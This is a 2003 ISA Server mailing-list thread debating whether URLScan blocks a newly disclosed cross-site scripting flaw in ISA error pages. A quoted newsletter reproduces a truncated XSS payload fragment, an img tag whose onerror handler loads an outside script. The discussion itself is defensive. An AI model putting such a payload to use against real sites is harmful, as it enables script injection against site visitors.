Hi Jim, Arrg. bummer Thomas W Shinder www.isaserver.org/shinder ISA Server and Beyond: http://tinyurl.com/1jq1 Configuring ISA Server: http://tinyurl.com/1llp -----Original Message----- From: Jim Harrison [mailto:jim@xxxxxxxxxxxx] Sent: Saturday, July 19, 2003 9:20 AM To: [ISAserver.org Discussion List] Subject: [isalist] Re: ISA Cross Scripting Vulnerability KB article http://www.ISAserver.org Unfortunately, URLScan won't help. The XSS URL is already in the browser before ISA receives the request. It actually depends on ISA producing one of the error pages that contain the vulnerable code. Jim Harrison MCP(NT4, W2K), A+, Network+, PCG http://www.microsoft.com/isaserver http://isaserver.org/Jim_Harrison http://isatools.org Read the help, books and articles! ----- Original Message ----- From: "cdawkins" <cdawkins@xxxxxxxxxxxxx> To: "[ISAserver.org Discussion List]" <isalist@xxxxxxxxxxxxx> Sent: Saturday, July 19, 2003 05:07 Subject: [isalist] Re: ISA Cross Scripting Vulnerability KB article http://www.ISAserver.org Here is a quote from an IIS newsletter I receive <5> Cross scripting attack with ISA server easily defeated with URLScan I want to point out a newly announced cross scripting attack that affects ISA server. See http://www.pivx.com/larholm/adv/TL006/ for details. Notice that URL to implement the exploit is something like "http:// <img%09src=""%09onerror="document.scripts[0].src=%27http%5Cx3a%5Cx2f%5Cx 2f This is a serious vulnerability, but if URLScan is installed on the ISA server, in most configurations, this URL would be rejected instead of processed. Once again, URLScan proves itself as a strong defender of future, unknown attacks. ------------------------------------------------------ List Archives: http://www.webelists.com/cgi/lyris.pl?enter=isalist ISA Server Newsletter: http://www.isaserver.org/pages/newsletter.asp ISA Server FAQ: http://www.isaserver.org/pages/larticle.asp?type=FAQ ------------------------------------------------------ Other Internet Software Marketing Sites: Leading Network Software Directory: http://www.serverfiles.com No.1 Exchange Server Resource Site: http://www.msexchange.org Windows Security Resource Site: http://www.windowsecurity.com/ Network Security Library: http://www.secinf.net/ Windows 2000/NT Fax Solutions: http://www.ntfaxfaq.com ------------------------------------------------------ You are currently subscribed to this ISAserver.org Discussion List as: jim@xxxxxxxxxxxx To unsubscribe send a blank email to $subst('Email.Unsub') ------------------------------------------------------ List Archives: http://www.webelists.com/cgi/lyris.pl?enter=isalist ISA Server Newsletter: http://www.isaserver.org/pages/newsletter.asp ISA Server FAQ: http://www.isaserver.org/pages/larticle.asp?type=FAQ ------------------------------------------------------ Other Internet Software Marketing Sites: Leading Network Software Directory: http://www.serverfiles.com No.1 Exchange Server Resource Site: http://www.msexchange.org Windows Security Resource Site: http://www.windowsecurity.com/ Network Security Library: http://www.secinf.net/ Windows 2000/NT Fax Solutions: http://www.ntfaxfaq.com ------------------------------------------------------ You are currently subscribed to this ISAserver.org Discussion List as: tshinder@xxxxxxxxxxxxxxxxxx To unsubscribe send a blank email to $subst('Email.Unsub')